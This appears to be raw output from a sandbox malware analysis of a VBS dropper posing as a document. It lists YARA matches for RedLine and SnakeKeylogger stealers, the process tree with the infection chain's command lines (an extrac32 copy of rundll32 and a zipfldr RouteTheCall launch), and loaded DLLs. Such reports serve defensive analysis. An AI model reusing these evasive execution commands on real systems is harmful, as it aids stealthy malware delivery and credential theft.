Source: 00000006.00000001.1720780507.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000A.00000002.3012481988.0000000024330000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000A.00000002.3012481988.0000000024330000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000002.3012481988.0000000024330000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000A.00000002.2971876015.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000F.00000002.2998810475.0000000030BC9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000006.00000002.3011915133.000000001FF40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000006.00000002.3011915133.000000001FF40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000006.00000002.3011915133.000000001FF40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000006.00000002.2996815062.000000001CE19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: fptrsiaN.pif PID: 5316, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: fptrsiaN.pif PID: 1196, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: fptrsiaN.pif PID: 2836, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: 6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 6.2.fptrsiaN.pif.1ff40000.5.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 6.2.fptrsiaN.pif.1ff40000.5.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 6.2.fptrsiaN.pif.1ff40000.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 6.2.fptrsiaN.pif.1ff40000.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 6.2.fptrsiaN.pif.1ff40000.5.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 6.3.fptrsiaN.pif.1b2ec7f8.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 6.3.fptrsiaN.pif.1b2ec7f8.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 6.2.fptrsiaN.pif.1ce5ac4e.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 6.2.fptrsiaN.pif.1ce5ac4e.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winVBS@23/10@4/4

Source: C:\Users\Public\ndpha.pif

Code function: 8_2_00153C66 LoadLibraryExW,GetLastError,FormatMessageW,RtlImageNtHeader,SetProcessMitigationPolicy,

8_2_00153C66

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 1_2_029C79B4 GetDiskFreeSpaceA,

1_2_029C79B4

Source: C:\Users\Public\Libraries\fptrsiaN.pif

Code function: 6_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,

6_2_004019F0

Source: C:\Users\Public\ndpha.pif

Code function: 8_2_0015205A CoCreateInstance,

8_2_0015205A

Source: C:\Users\Public\Libraries\fptrsiaN.pif

6_2_004019F0

Source: C:\Users\user\AppData\Local\Temp\x.exe

File created: C:\Users\Public\NaisrtpfF.cmd

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1068:120:WilError_03
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6020:120:WilError_03

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\x.exe

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Draft doc PI ITS15235.vbs"

Source: C:\Users\Public\Libraries\fptrsiaN.pif	Command line argument: 08A	6_2_00413780
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Command line argument: 08A	6_2_00413780
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Command line argument: 08A	6_1_00413780
Source: C:\Users\Public\ndpha.pif	Command line argument: WLDP.DLL	8_2_00154136
Source: C:\Users\Public\ndpha.pif	Command line argument: localserver	8_2_00154136
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Command line argument: 08A	10_2_00413780
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Command line argument: 08A	10_2_00413780
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Command line argument: 08A	10_1_00413780

Source: C:\Users\user\AppData\Local\Temp\x.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Draft doc PI ITS15235.vbs	Virustotal: Detection: 49%
Source: Draft doc PI ITS15235.vbs	ReversingLabs: Detection: 40%

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Draft doc PI ITS15235.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\NaisrtpfF.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\\Naisrtpf10.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Users\Public\Libraries\fptrsiaN.pif C:\Users\Public\Libraries\fptrsiaN.pif
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\rundll32.exe C:\\Users\\Public\\ndpha.pif
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\ndpha.pif C:\\Users\\Public\\ndpha.pif zipfldr.dll,RouteTheCall C:\Windows \SysWOW64\svchost.pif
Source: unknown	Process created: C:\Users\Public\Libraries\Naisrtpf.PIF "C:\Users\Public\Libraries\Naisrtpf.PIF"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\Public\Libraries\fptrsiaN.pif C:\Users\Public\Libraries\fptrsiaN.pif
Source: unknown	Process created: C:\Users\Public\Libraries\Naisrtpf.PIF "C:\Users\Public\Libraries\Naisrtpf.PIF"
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Process created: C:\Users\Public\Libraries\fptrsiaN.pif C:\Users\Public\Libraries\fptrsiaN.pif
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\NaisrtpfF.cmd" "	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\\Naisrtpf10.cmd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Users\Public\Libraries\fptrsiaN.pif C:\Users\Public\Libraries\fptrsiaN.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\rundll32.exe C:\\Users\\Public\\ndpha.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\ndpha.pif C:\\Users\\Public\\ndpha.pif zipfldr.dll,RouteTheCall C:\Windows \SysWOW64\svchost.pif	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Process created: C:\Users\Public\Libraries\fptrsiaN.pif C:\Users\Public\Libraries\fptrsiaN.pif	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Process created: C:\Users\Public\Libraries\fptrsiaN.pif C:\Users\Public\Libraries\fptrsiaN.pif

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msdart.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: url.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
